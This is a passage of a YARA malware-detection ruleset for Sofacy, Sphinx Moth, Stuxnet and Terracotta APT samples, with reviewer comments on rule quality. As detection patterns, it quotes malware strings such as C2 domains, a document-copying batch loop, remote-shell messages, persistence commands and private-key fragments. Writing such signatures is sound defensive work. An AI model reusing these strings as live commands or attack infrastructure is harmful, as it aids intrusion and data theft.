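        $mix2 = "error in select, errno %d"
        $mix3 = "no msg"
        $mix4 = "is you live?"
        $mix5 = "127.0.0.1"
        $mix6 = "err %d"
        $mix7 = "i`m wait"
        $mix8 = "hello"
        $mix9 = "OpenSSL 1.0.1e 11 Feb 2013"
        $mix10 = "Xtunnel.exe"

    condition:
        ((uint16(0) == 0x5A4D) or (uint16(0) == 0xCFD0))
        and (
            ($xaps)
            or (all of ($variant1*))
            or (all of ($variant2*))
            or (6 of ($mix*))
        )
}

/*
 * Winexe remote-execution tool as used in the Bundestag intrusion: PE under
 * 115KB with the ahexec pipe name and "implevel" option. Winexe is a dual-use
 * admin tool; score 70.
 */
rule Sofacy_Bundestag_Winexe
{
    meta:
        description = "Winexe tool used by Sofacy group in Bundestag APT"
        author = "Florian Roth"
        reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
        date = "2015-06-19"
        hash = "5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d"
        score = 70

    strings:
        $s1 = "\\\\.\\pipe\\ahexec" fullword ascii
        $s2 = "implevel" fullword ascii

    condition:
        uint16(0) == 0x5a4d and filesize < 115KB and all of them
}

/*
 * Sofacy X-Tunnel build: MZ at 0, one of the XAPS project strings and the
 * "i`m wait" message. No size cap.
 */
rule Sofacy_Bundestag_Mal2
{
    meta:
        description = "Sofacy Group Malware Sample 2"
        author = "Florian Roth"
        reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
        date = "2015-06-19"
        hash = "566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092"
        score = 70

    strings:
        $x1 = "PROJECT\\XAPS_OBJECTIVE_DLL\\" ascii
        $x2 = "XAPS_OBJECTIVE.dll" fullword ascii
        $s1 = "i`m wait" fullword ascii

    condition:
        uint16(0) == 0x5a4d and ( 1 of ($x*) ) and $s1
}

/*
 * Sofacy X-Agent build (USB-propagating keylogger): PE under 300KB with two of
 * the $s* strings (autorun command, RTTI name, HTML status messages, C2
 * domains), or one $s* plus all three $x* (two UA prefixes and cmd.exe path).
 */
rule Sofacy_Bundestag_Mal3
{
    meta:
        description = "Sofacy Group Malware Sample 3"
        author = "Florian Roth"
        reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
        date = "2015-06-19"
        hash = "5f6b2a0d1d966fc4f1ed292b46240767f4acb06c13512b0061b434ae2a692fa1"
        score = 70

    strings:
        $s1 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" fullword ascii
        $s2 = ".?AVAgentModuleRemoteKeyLogger@@" fullword ascii
        $s3 = "<font size=4 color=red>process isn't exist</font>" fullword ascii
        $s4 = "<font size=4 color=red>process is exist</font>" fullword ascii
        $s5 = ".winnt.check-fix.com" fullword ascii
        $s6 = ".update.adobeincorp.com" fullword ascii
        $s7 = ".microsoft.checkwinframe.com" fullword ascii
        $s8 = "adobeincorp.com" fullword wide
        $s9 = "# EXC: HttpSender - Cannot create Get Channel!" fullword ascii
        // "NT 6." in $x2 and the truncated "Firefox/2" are as published.
        $x1 = "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/" wide
        $x2 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2" wide
        $x3 = "C:\\Windows\\System32\\cmd.exe" fullword wide

    condition:
        uint16(0) == 0x5a4d and filesize < 300KB
        and ( 2 of ($s*) or ( 1 of ($s*) and all of ($x*) ))
}

/*
 * Document-collection batch script from the Bundestag case: under 10KB with
 * the document-extension loop, "cmd /c copy" and "forfiles". No header check
 * (it is a text file).
 */
rule Sofacy_Bundestag_Batch
{
    meta:
        description = "Sofacy Bundestags APT Batch Script"
        author = "Florian Roth"
        reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
        date = "2015-06-19"
        score = 70

    strings:
        $s1 = "for %%G in (.pdf, .xls, .xlsx, .doc, .docx) do (" ascii
        $s2 = "cmd /c copy"
        $s3 = "forfiles"

    condition:
        filesize < 10KB and all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

/*
    Yara Rule Set
    Author: Florian Roth
    Date: 2016-02-13
    Identifier: Sofacy Fysbis
*/

/*
 * Fysbis Linux backdoor, generation 1. An ELF (bytes 7F 45 read little-endian
 * as 0x457f) under 500KB with one of the broken-English shell messages ($x*),
 * or - without the header/size anchor - one $x* plus three of the systemd
 * persistence / distro-probe strings ($s*).
 *
 * Fix: the description previously read "Detects Sofacy Fysbis Linux
 * Backdoor_Naikon_APT_Sample1", a copy-paste leftover that misattributed the
 * match in scanner output; it now matches the Gen2 rule below.
 */
rule Sofacy_Fybis_ELF_Backdoor_Gen1
{
    meta:
        description = "Detects Sofacy Fysbis Linux Backdoor"
        author = "Florian Roth"
        reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"
        date = "2016-02-13"
        score = 80
        hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592"
        hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb"

    strings:
        $x1 = "Your command not writed to pipe" fullword ascii
        $x2 = "Terminal don`t started for executing command" fullword ascii
        $x3 = "Command will have end with \\n" fullword ascii

        $s1 = "WantedBy=multi-user.target' >> /usr/lib/systemd/system/" fullword ascii
        $s2 = "Success execute command or long for waiting executing your command" fullword ascii
        $s3 = "ls /etc | egrep -e\"fedora*|debian*|gentoo*|mandriva*|mandrake*|meego*|redhat*|lsb-*|sun-*|SUSE*|release\"" fullword ascii
        $s4 = "rm -f /usr/lib/systemd/system/" fullword ascii
        $s5 = "ExecStart=" fullword ascii
        $s6 = "<table><caption><font size=4 color=red>TABLE EXECUTE FILES</font></caption>" fullword ascii

    condition:
        ( uint16(0) == 0x457f and filesize < 500KB and 1 of ($x*) )
        or ( 1 of ($x*) and 3 of ($s*) )
}

/*
 * Fysbis generation 2: ELF under 500KB carrying the RemoteShell and
 * HttpChannel class names plus a libstdc++ symbol - all three required.
 * Not fullword on $s1/$s3, so mangled symbol names also count.
 */
rule Sofacy_Fysbis_ELF_Backdoor_Gen2
{
    meta:
        description = "Detects Sofacy Fysbis Linux Backdoor"
        author = "Florian Roth"
        reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"
        date = "2016-02-13"
        score = 80
        hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592"
        hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb"
        hash3 = "fd8b2ea9a2e8a67e4cb3904b49c789d57ed9b1ce5bebfe54fe3d98214d6a0f61"

    strings:
        $s1 = "RemoteShell" ascii
        $s2 = "basic_string::_M_replace_dispatch" fullword ascii
        $s3 = "HttpChannel" ascii

    condition:
        uint16(0) == 0x457f and filesize < 500KB and all of them
}

/*
    Yara Rule Set
    Author: Florian Roth
    Date: 2016-06-14
    Identifier: Sofacy June 2016
*/

/* Rule Set ----------------------------------------------------------------- */

/*
 * Sofacy loader (June 2016): a PE under 200KB with EITHER the "clconfg.dll"
 * name or the mutex-like token is enough, or both strings anywhere. A single
 * file-name hit is thin on its own - expect to triage.
 */
rule Sofacy_Jun16_Sample1
{
    meta:
        description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
        author = "Florian Roth"
        reference = "http://goo.gl/mzAa97"
        date = "2016-06-14"
        score = 85
        hash1 = "be1cfa10fcf2668ae01b98579b345ebe87dab77b6b1581c368d1aba9fd2f10a0"

    strings:
        $s1 = "clconfg.dll" fullword ascii
        $s2 = "ASijnoKGszdpodPPiaoaghj8127391" fullword wide

    condition:
        ( uint16(0) == 0x5a4d and filesize < 200KB and ( 1 of ($s*) ) )
        or ( all of them )
}

/*
 * Sofacy downloader (three builds): PE under 100KB with both $x* strings, or
 * any three of the six strings without an anchor. $s1/$s2 are garbled
 * proxy-config fragments exactly as they appear in the samples; $s3
 * ("svchost.dll") is generic.
 */
rule Sofacy_Jun16_Sample2
{
    meta:
        description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
        author = "Florian Roth"
        reference = "http://goo.gl/mzAa97"
        date = "2016-06-14"
        score = 85
        hash1 = "57d230ddaf92e2d0504e5bb12abf52062114fb8980c5ecc413116b1d6ffedf1b"
        hash2 = "69940a20ab9abb31a03fcefe6de92a16ed474bbdff3288498851afc12a834261"
        hash3 = "aeeab3272a2ed2157ebf67f74c00fafc787a2b9bbaa17a03be1e23d4cb273632"

    strings:
        $x1 = "DGMNOEP" fullword ascii
        $x2 = "/%s%s%s/?%s=" fullword ascii
        $s1 = "Control Panel\\Dehttps=https://%snetwork.proxy.ht2" fullword ascii
        $s2 = "http=http://%s:%Control Panel\\Denetwork.proxy.ht&ol1mS9" fullword ascii
        $s3 = "svchost.dll" fullword wide
        $s4 = "clconfig.dll" fullword wide

    condition:
        ( uint16(0) == 0x5a4d and filesize < 100KB and ( all of ($x*) ) )
        or ( 3 of them )
}

/*
 * Sofacy sample pinned by a single unique wide token in a PE under 200KB.
 */
rule Sofacy_Jun16_Sample3
{
    meta:
        description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
        author = "Florian Roth"
        reference = "http://goo.gl/mzAa97"
        date = "2016-06-14"
        score = 85
        hash1 = "c2551c4e6521ac72982cb952503a2e6f016356e02ee31dea36c713141d4f3785"

    strings:
        $s1 = "ASLIiasiuqpssuqkl713h" fullword wide

    condition:
        uint16(0) == 0x5a4d and filesize < 200KB and $s1
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

/*
    Yara Rule Set
    Author: Kudelski Security (modified by Florian Roth)
    Reference: https://www.kudelskisecurity.com/sites/default/files/sphinx_moth_cfc_report.pdf
    Date: 2015-11-23
    Identifier: Sphinx Moth
*/

/*
 * Sphinx Moth cudacrt.dll: PE under 243KB with all three strings (HP SSO
 * library name, 255.255.255.254 address, SsoAuth service key) and one of the
 * three opcode fragments.
 */
rule Sphinx_Moth_cudacrt
{
    meta:
        description = "sphinx moth threat group file cudacrt.dll"
        author = "Kudelski Security - Nagravision SA"
        reference = "www.kudelskisecurity.com"
        date = "2015-08-06"

    strings:
        $s0 = "HPSSOEx.dll" fullword wide
        $s1 = "255.255.255.254" fullword wide
        $s2 = "SOFTWARE\\SsoAuth\\Service" fullword wide
        $op0 = { ff 15 5f de 00 00 48 8b f8 48 85 c0 75 0d 48 8b } /* Opcode */
        $op1 = { 45 33 c9 4c 8d 05 a7 07 00 00 33 d2 33 c9 ff 15 } /* Opcode */
        $op2 = { e8 7a 1c 00 00 83 f8 01 74 17 b9 03 } /* Opcode */

    condition:
        uint16(0) == 0x5a4d and filesize < 243KB and all of ($s*) and 1 of ($op*)
}

/*
 * Sphinx Moth h2t.dat (HTTP-to-TCP proxy helper): PE under 156KB with the
 * usage line, or all five of the error / POST / pipe strings.
 */
rule Sphinx_Moth_h2t
{
    meta:
        description = "sphinx moth threat group file h2t.dat"
        author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
        reference = "www.kudelskisecurity.com"
        date = "2015-08-06"

    strings:
        $x1 = "%s <proxy ip> <proxy port> <target ip> <target port> <cmd> [arg1 cmd] ... [argX cmd]" fullword ascii
        $s1 = "[-] Error in connection() %d - %s" fullword ascii
        $s2 = "[-] Child process exit." fullword ascii
        $s3 = "POST http://%s:%s/ HTTP/1.1" fullword ascii
        $s4 = "pipe() to" fullword ascii
        $s5 = "pipe() from" fullword ascii

    condition:
        uint16(0) == 0x5a4d and filesize < 156KB and ($x1 or all of ($s*))
}

/*
 * Sphinx Moth iastor32.exe: PE under 2000KB carrying two base64 lines of an
 * embedded private key. Both lines are required; any re-keyed build will not
 * match this rule.
 */
rule Sphinx_Moth_iastor32
{
    meta:
        description = "sphinx moth threat group file iastor32.exe"
        author = "Kudelski Security - Nagravision SA"
        reference = "www.kudelskisecurity.com"
        date = "2015-08-06"

    strings:
        $s0 = "MIIEpQIBAAKCAQEA4lSvv/W1Mkz38Q3z+EzJBZRANzKrlxeE6/UXWL67YtokF2nN" fullword ascii /* private key */
        $s1 = "iAeS3CCA4wli6+9CIgX8SAiXd5OezHvI1jza61z/flsqcC1IP//gJVt16nRx3s9z" fullword ascii /* private key */

    condition:
        uint16(0) == 0x5a4d and filesize < 2000KB and all of them
}

/*
 * Sphinx Moth kerberos32.dll (LSASS-adjacent credential component): PE under
 * 300KB with two of the file-name / drop-path strings ($x*), or all eight of
 * the pipe-name, NullSessionPipes and logging-command strings ($s*).
 */
rule Sphinx_Moth_kerberos32
{
    meta:
        description = "sphinx moth threat group file kerberos32.dll"
        author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
        reference = "www.kudelskisecurity.com"
        date = "2015-08-06"

    strings:
        $x1 = "%WINDIR%\\ativpsrz.bin" fullword ascii
        $x2 = "%WINDIR%\\ativpsrn.bin" fullword ascii
        $x3 = "kerberos32.dll" fullword wide
        $x4 = "KERBEROS64.dll" fullword ascii
        $x5 = "kerberos%d.dll" fullword ascii
        $s1 = "\\\\.\\pipe\\lsassp" fullword ascii
        $s2 = "LSASS secure pipe" fullword ascii
        $s3 = "NullSessionPipes" fullword ascii
        $s4 = "getlog" fullword ascii
        $s5 = "startlog" fullword ascii
        $s6 = "stoplog" fullword ascii
        $s7 = "Unsupported OS (%d)" fullword ascii
        $s8 = "Unsupported OS (%s)" fullword ascii

    condition:
        uint16(0) == 0x5a4d and filesize < 300KB and (2 of ($x*) or all of ($s*))
}

rule Sphinx_Moth_kerberos64 { meta: description = "sphinx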
moth threat group file kerberos64.dll" author = "Kudelski Security - Nagravision SA (modified by Florian Roth)" reference = "www.kudelskisecurity.com" date = "2015-08-06" strings: $s0 = "KERBEROS64.dll" fullword ascii $s1 = "zeSecurityDescriptor" fullword ascii $s2 = "SpGetInfo" fullword ascii $s3 = "SpShutdown" fullword ascii $op0 = { 75 05 e8 6a c7 ff ff 48 8b 1d 47 d6 00 00 33 ff } /* Opcode */ $op1 = { 48 89 05 0c 2b 01 00 c7 05 e2 29 01 00 09 04 00 } /* Opcode */ $op2 = { 48 8d 3d e3 ee 00 00 ba 58 } /* Opcode */ condition: uint16(0) == 0x5a4d and filesize < 406KB and all of ($s*) and 1 of ($op*) } rule Sphinx_Moth_nvcplex { meta: description = "sphinx moth threat group file nvcplex.dat" author = "Kudelski Security - Nagravision SA" reference = "www.kudelskisecurity.com" date = "2015-08-06" strings: $s0 = "mshtaex.exe" fullword wide $op0 = { 41 8b cc 44 89 6c 24 28 48 89 7c 24 20 ff 15 d3 } /* Opcode */ $op1 = { 48 3b 0d ad 8f 00 00 74 05 e8 ba f5 ff ff 48 8b } /* Opcode */ $op2 = { 8b ce e8 49 47 00 00 90 8b 43 04 89 05 93 f1 00 } /* Opcode */ condition: uint16(0) == 0x5a4d and filesize < 214KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule StuxNet_Malware_1 { meta: description = "Stuxnet Sample - file malware.exe" author = "Florian Roth" reference = "Internal Research" date = "2016-07-09" hash1 = "9c891edb5da763398969b6aaa86a5d46971bd28a455b20c2067cb512c9f9a0f8" strings: // 0x10001778 8b 45 08 mov eax, dword ptr [ebp + 8] // 0x1000177b 35 dd 79 19 ae xor eax, 0xae1979dd // 0x10001780 33 c9 xor ecx, ecx // 0x10001782 8b 55 08 mov edx, dword ptr [ebp + 8] // 0x10001785 89 02 mov dword ptr [edx], eax // 0x10001787 89 ?? ?? 
mov dword ptr [edx + 4], ecx $op1 = { 8b 45 08 35 dd 79 19 ae 33 c9 8b 55 08 89 02 89 } // 0x10002045 74 36 je 0x1000207d // 0x10002047 8b 7f 08 mov edi, dword ptr [edi + 8] // 0x1000204a 83 ff 00 cmp edi, 0 // 0x1000204d 74 2e je 0x1000207d // 0x1000204f 0f b7 1f movzx ebx, word ptr [edi] // 0x10002052 8b 7f 04 mov edi, dword ptr [edi + 4] $op2 = { 74 36 8b 7f 08 83 ff 00 74 2e 0f b7 1f 8b 7f 04 } // 0x100020cf 74 70 je 0x10002141 // 0x100020d1 81 78 05 8d 54 24 04 cmp dword ptr [eax + 5], 0x424548d // 0x100020d8 75 1b jne 0x100020f5 // 0x100020da 81 78 08 04 cd ?? ?? cmp dword ptr [eax + 8], 0xc22ecd04 $op3 = { 74 70 81 78 05 8d 54 24 04 75 1b 81 78 08 04 cd } condition: all of them } rule Stuxnet_Malware_2 { meta: description = "Stuxnet Sample - file 63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b32802" author = "Florian Roth" reference = "Internal Research" date = "2016-07-09" hash1 = "63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b32802" strings: $s1 = "\\SystemRoot\\System32\\hal.dll" fullword wide $s2 = "http://www.jmicron.co.tw0" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 70KB and all of them } rule StuxNet_dll { meta: description = "Stuxnet Sample - file dll.dll" author = "Florian Roth" reference = "Internal Research" date = "2016-07-09" hash1 = "9e392277f62206098cf794ddebafd2817483cfd57ec03c2e05e7c3c81e72f562" strings: $s1 = "SUCKM3 FROM EXPLORER.EXE MOTH4FUCKA #@!" 
fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and $s1 }
/*
   Stuxnet .lnk sample. A shell link starts with a 4-byte HeaderSize of
   0x4C, which is why the header test is uint16(0) == 0x004c.
   NOTE(review): $x1 is a complete device-instance path for one Kingston
   DataTraveler (vendor, product, revision and the unit serial are all in
   the string), so this rule matches the single analysed LNK (hash1) and
   not Stuxnet-style malicious shortcuts in general. Do not read a miss
   as "no Stuxnet LNK present".
*/
rule Stuxnet_Shortcut_to { meta: description = "Stuxnet Sample - file Copy of Shortcut to.lnk" author = "Florian Roth" reference = "Internal Research" date = "2016-07-09" hash1 = "801e3b6d84862163a735502f93b9663be53ccbdd7f12b0707336fecba3a829a2" strings: $x1 = "\\\\.\\STORAGE#Volume#_??_USBSTOR#Disk&Ven_Kingston&Prod_DataTraveler_2.0&Rev_PMAP#5B6B098B97BE&0#{53f56307-b6bf-11d0-94f2-00a0c" wide condition: uint16(0) == 0x004c and filesize < 10KB and $x1 }
/*
   ~WTR4141.tmp loader. Inside a PE under 150KB either $x1 alone or any
   three $s strings suffice; the trailing "( 5 of them )" branch has no
   header or size gate, so the rule can also fire on unpacked/in-memory
   copies where offset 0 is not an MZ stamp.
*/
rule Stuxnet_Malware_3 { meta: description = "Stuxnet Sample - file ~WTR4141.tmp" author = "Florian Roth" reference = "Internal Research" date = "2016-07-09" hash1 = "6bcf88251c876ef00b2f32cf97456a3e306c2a263d487b0a50216c6e3cc07c6a" hash2 = "70f8789b03e38d07584f57581363afa848dd5c3a197f2483c6dfa4f3e7f78b9b" strings: $x1 = "SHELL32.DLL.ASLR." fullword wide $s1 = "~WTR4141.tmp" fullword wide $s2 = "~WTR4132.tmp" fullword wide $s3 = "totalcmd.exe" fullword wide $s4 = "wincmd.exe" fullword wide $s5 = "http://www.realtek.com0" fullword ascii $s6 = "{%08x-%08x-%08x-%08x}" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 150KB and ( $x1 or 3 of ($s*) ) ) or ( 5 of them ) }
/*
   Stuxnet kernel driver components.
   NOTE(review): "1 of them" inside an <80KB PE means a single fullword
   wide "MRxCls.sys" or "MRXNET.Sys" is enough to fire, so small tools or
   IOC lists that embed those driver names as UTF-16 strings may also
   match. The guava.pdb build path ($x1) or the "all of them" branch are
   the stronger evidence when triaging a hit.
*/
rule Stuxnet_Malware_4 { meta: description = "Stuxnet Sample - file 0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c709198" author = "Florian Roth" reference = "Internal Research" date = "2016-07-09" hash1 = "0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c709198" hash2 = "1635ec04f069ccc8331d01fdf31132a4bc8f6fd3830ac94739df95ee093c555c" strings: $x1 = "\\objfre_w2k_x86\\i386\\guava.pdb" ascii $x2 = "MRxCls.sys" fullword wide $x3 = "MRXNET.Sys" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 80KB and 1 of them ) or ( all of them ) }
/* Decrypted and unpacked main DLL; strings and condition continue below. */
rule Stuxnet_maindll_decrypted_unpacked { meta: description = "Stuxnet Sample - file maindll.decrypted.unpacked.dll_" author = "Florian Roth" reference = "Internal Research" date = "2016-07-09" hash1 =
"4c3d7b38339d7b8adf73eaf85f0eb9fab4420585c6ab6950ebd360428af11712" strings: $s1 = "%SystemRoot%\\system32\\Drivers\\mrxsmb.sys;%SystemRoot%\\system32\\Drivers\\*.sys" fullword wide $s2 = "<Actions Context=\"%s\"><Exec><Command>%s</Command><Arguments>%s,#%u</Arguments></Exec></Actions>" fullword wide $s3 = "%SystemRoot%\\inf\\oem7A.PNF" fullword wide $s4 = "%SystemRoot%\\inf\\mdmcpq3.PNF" fullword wide $s5 = "%SystemRoot%\\inf\\oem6C.PNF" fullword wide $s6 = "@abf varbinary(4096) EXEC @hr = sp_OACreate 'ADODB.Stream', @aods OUT IF @hr <> 0 GOTO endq EXEC @hr = sp_OASetProperty @" wide $s7 = "STORAGE#Volume#1&19f7e59c&0&" fullword wide $s8 = "view MCPVREADVARPERCON as select VARIABLEID,VARIABLETYPEID,FORMATFITTING,SCALEID,VARIABLENAME,ADDRESSPARAMETER,PROTOKOLL,MAXLIMI" ascii condition: 6 of them } rule Stuxnet_s7hkimdb { meta: description = "Stuxnet Sample - file s7hkimdb.dll" author = "Florian Roth" reference = "Internal Research" date = "2016-07-09" hash1 = "4071ec265a44d1f0d42ff92b2fa0b30aafa7f6bb2160ed1d0d5372d70ac654bd" strings: $x1 = "S7HKIMDX.DLL" fullword wide /* Opcodes by Binar.ly */ // 0x10001778 8b 45 08 mov eax, dword ptr [ebp + 8] // 0x1000177b 35 dd 79 19 ae xor eax, 0xae1979dd // 0x10001780 33 c9 xor ecx, ecx // 0x10001782 8b 55 08 mov edx, dword ptr [ebp + 8] // 0x10001785 89 02 mov dword ptr [edx], eax // 0x10001787 89 ?? ?? mov dword ptr [edx + 4], ecx $op1 = { 8b 45 08 35 dd 79 19 ae 33 c9 8b 55 08 89 02 89 } // 0x10002045 74 36 je 0x1000207d // 0x10002047 8b 7f 08 mov edi, dword ptr [edi + 8] // 0x1000204a 83 ff 00 cmp edi, 0 // 0x1000204d 74 2e je 0x1000207d // 0x1000204f 0f b7 1f movzx ebx, word ptr [edi] // 0x10002052 8b 7f 04 mov edi, dword ptr [edi + 4] $op2 = { 74 36 8b 7f 08 83 ff 00 74 2e 0f b7 1f 8b 7f 04 } // 0x100020cf 74 70 je 0x10002141 // 0x100020d1 81 78 05 8d 54 24 04 cmp dword ptr [eax + 5], 0x424548d // 0x100020d8 75 1b jne 0x100020f5 // 0x100020da 81 78 08 04 cd ?? ?? 
cmp dword ptr [eax + 8], 0xc22ecd04 $op3 = { 74 70 81 78 05 8d 54 24 04 75 1b 81 78 08 04 cd } condition: ( uint16(0) == 0x5a4d and filesize < 40KB and $x1 and all of ($op*) ) }
/*
   NOTE(review): $op1-$op3 of Stuxnet_s7hkimdb above are byte-for-byte
   the same patterns as in StuxNet_Malware_1; a shared private rule
   would keep the two copies from drifting apart.
*/
/*
   NOTE(review): despite its name this rule does not detect Stuxnet.
   The referenced repository is a Python graph model of Stuxnet-style
   propagation (the quoted code builds nx.Graph nodes typed
   COMPUTER/DISCONNECTED_COMPUTER/USB/PLC), and the three strings are
   source lines from that project. With "any of them" a single one of
   them is enough, and there is no file-type or size gate. Treat a hit
   as "that simulation's source code is present", not as ICS malware;
   consider assigning it a low score or excluding it from memory scans
   so it does not inflate Stuxnet-labelled results.
*/
rule Stuxnet_MadeInPython { meta: description = "Python has been used frequently by threat actors for compiling executable file with source code. I found python Stuxnet source code that can be executed with required dependencies. This rule is created in hopes to catch potental breakout of future Stuxnet." author = "Jin Kim" reference = "https://github.com/kenmueller/stuxnet" date = "2020-12-23" strings: // main function include this call stack as a second function call. $str1 = "old_infected_attributes = node_infected_attributes(graph)" // def node_total_attributes(graph: nx.Graph) -> dict: // filter_for_node_type = lambda node_type: list(filter(lambda node: get_node_type(graph, node) == node_type, graph.node)) // return { // NodeType.COMPUTER: len(filter_for_node_type(NodeType.COMPUTER)), // NodeType.DISCONNECTED_COMPUTER: len(filter_for_node_type(NodeType.DISCONNECTED_COMPUTER)), // NodeType.USB: len(filter_for_node_type(NodeType.USB)), // NodeType.PLC: len(filter_for_node_type(NodeType.PLC)), // 'total': len(graph.node) $str2 = "NodeType.DISCONNECTED_COMPUTER" // found in create-graph.py // This line adds router nodes and computer nodes fro all the wireless networks. // for router_node in range(NUMBER_OF_LOCAL_WIRED_NETWORKS, NUMBER_OF_LOCAL_NETWORKS): // add_computer_nodes(graph, EdgeType.LOCAL_WIRELESS, router_node) $str3 = "add_computer_nodes(graph, EdgeType.LOCAL_WIRELESS, router_node)" condition: any of them }
/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ /* Rule Set ----------------------------------------------------------------- */ /* Yara Rule Set Author: Florian Roth Date: 2015-08-04 Identifier: Terracotta APT Comment: Reduced Rule Set */ rule Apolmy_Privesc_Trojan { meta: description = "Apolmy Privilege Escalation Trojan used in APT Terracotta" author = "Florian Roth" reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/" date = "2015-08-04" score = 80 hash = "d7bd289e6cee228eb46a1be1fcdc3a2bd5251bc1eafb59f8111756777d8f373d" strings: $s1 = "[%d] Failed, %08X" fullword ascii $s2 = "[%d] Offset can not fetched." fullword ascii $s3 = "PowerShadow2011" fullword wide condition: uint16(0) == 0x5a4d and filesize < 300KB and all of them } rule Mithozhan_Trojan { meta: description = "Mitozhan Trojan used in APT Terracotta" author = "Florian Roth" reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/" date = "2015-08-04" score = 70 hash = "8553b945e2d4b9f45c438797d6b5e73cfe2899af1f9fd87593af4fd7fb51794a" strings: $s1 = "adbrowser" fullword wide $s2 = "IJKLlGdmaWhram0vn36BgIOChYR3L45xcHNydXQvhmloa2ptbH8voYCDTw==" fullword ascii $s3 = "EFGHlGdmaWhrL41sf36BgIOCL6R3dk8=" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 300KB and all of them } rule RemoteExec_Tool { meta: description = "Remote Access Tool used in APT Terracotta" author = "Florian Roth" reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/" date = "2015-08-04" hash = "a550131e106ff3c703666f15d55d9bc8c816d1cb9ac1b73c2e29f8aa01e53b78" strings: $s0 = "cmd.exe /q /c \"%s\"" fullword ascii $s1 = "\\\\.\\pipe\\%s%s%d" fullword ascii $s2 = "This is a service executable! Couldn't start directly." 
fullword ascii $s3 = "\\\\.\\pipe\\TermHlp_communicaton" fullword ascii $s4 = "TermHlp_stdout" fullword ascii $s5 = "TermHlp_stdin" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 75KB and 4 of ($s*) } /* Super Rules ------------------------------------------------------------- */ rule LiuDoor_Malware_1 { meta: description = "Liudoor Trojan used in Terracotta APT" author = "Florian Roth" reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/" date = "2015-08-04" score = 70 super_rule = 1 hash1 = "deed6e2a31349253143d4069613905e1dfc3ad4589f6987388de13e33ac187fc" hash2 = "4575e7fc8f156d1d499aab5064a4832953cd43795574b4c7b9165cdc92993ce5" hash3 = "ad1a507709c75fe93708ce9ca1227c5fefa812997ed9104ff9adfec62a3ec2bb" strings: $s1 = "svchostdllserver.dll" fullword ascii $s2 = "SvcHostDLL: RegisterServiceCtrlHandler %S failed" fullword ascii $s3 = "\\nbtstat.exe" fullword ascii $s4 = "DataVersionEx" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 150KB and all of them } rule LiuDoor_Malware_2 { meta: description = "Liudoor Trojan used in Terracotta APT" author = "Florian Roth" reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/" date = "2015-08-04" score = 70 super_rule = 1 hash1 = "f3fb68b21490ded2ae7327271d3412fbbf9d705c8003a195a705c47c98b43800" hash2 = "e42b8385e1aecd89a94a740a2c7cd5ef157b091fabd52cd6f86e47534ca2863e" strings: $s0 = "svchostdllserver.dll" fullword ascii $s1 = "Lpykh~mzCCRv|mplpykCCHvq{phlCC\\jmmzqkIzmlvpqCC" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/
/*
   Liudoor daemon backdoor (RSA FirstWatch).
   NOTE(review): weak signature. $string0-$string3 are four-letter words,
   and $string5-$string8 look like ASCII renderings of common x86 code
   bytes (e.g. "QSUVWh" = 51 53 55 56 57 68, a run of push instructions)
   that many compiler-built binaries contain. The only discriminating
   token is $string4 "svchostdllserver.dll", which the LiuDoor_Malware_1/2
   rules above also key on but behind an MZ stamp and a filesize cap.
   Here there is no header or size check and no fullword/wide modifier;
   "all of them" limits the damage, but a lone liudoor hit without a
   LiuDoor_Malware_* hit should be treated as low confidence.
*/
